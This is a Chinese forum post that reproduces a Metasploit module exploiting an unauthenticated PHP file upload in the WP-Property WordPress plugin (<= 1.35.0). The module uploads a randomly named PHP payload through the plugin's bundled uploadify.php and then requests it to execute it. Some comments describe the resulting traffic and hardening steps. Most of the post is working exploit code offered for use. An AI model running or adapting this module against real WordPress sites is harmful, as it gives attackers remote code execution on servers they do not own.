
WordPress WP-Property PHP 文件上传漏洞

发表于 2013-1-4 19:51:30
WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

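# Framework core, plus the file that provides the PhpEXE mixin used by the class below.
require 'msf/core'
require 'msf/core/exploit/php_exe'
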
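# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (versions <= 1.35.0, per the module description).
#
# What the module puts on the wire, for anyone reviewing logs or writing
# detections:
#   * Every request goes to
#     <TARGETURI>/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php:
#     a GET from #check, and a multipart/form-data POST with the form fields
#     "Filedata" and "folder" from #exploit.
#   * The uploaded file name is five random letters followed by ".php".
#   * The POST is followed by a GET for whatever path the server returned in
#     its response body.
#   * The payload is requested with :unlink_self, so it presumably deletes
#     itself once it has run (TODO confirm against the PhpEXE mixin); web
#     access logs are a more dependable trace than leftover files.
#
# Hardening: the description lists <= 1.35.0 as affected, so run a later plugin
# release, and block direct web access to (or PHP execution in) the bundled
# third-party/uploadify directory.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # The forum rendering mangled this constant to "Msf::Exploit:hpEXE".
  # PhpEXE is the mixin loaded by require 'msf/core/exploit/php_exe' and is
  # what supplies get_write_exec_payload, called in #exploit.
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (name, references, targets, payload
  # constraints) and the TARGETURI option.
  #
  # @param info [Hash] metadata overrides merged in by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Requests uploadify.php under TARGETURI with a GET.
  #
  # Returns Unknown when there is no response or the status is not 200, and
  # Appears otherwise. The result only shows that the script is reachable: the
  # plugin version is never read, so an install that is no longer vulnerable
  # may still be reported as Appears.
  #
  # @return [Exploit::CheckCode]
  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  # Uploads a PHP payload through uploadify.php and then requests the path the
  # server reports back.
  #
  # Fails with UnexpectedReply unless the upload response is a 200 whose body
  # contains the generated file name.
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    # Five random letters plus ".php"; kept in an ivar so the log lines and the
    # response check below use the same name.
    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self => true)

    # Two form parts: the file itself ("Filedata") and the destination
    # directory ("folder"), which is set to the uploadify directory.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drops the CRLF that the regex matches in front of a boundary marker; why
    # the receiving script needs this is not evident from this file.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the URI of the follow-up request.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end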

不要问我这写的是什么、怎么利用,我是说 msf。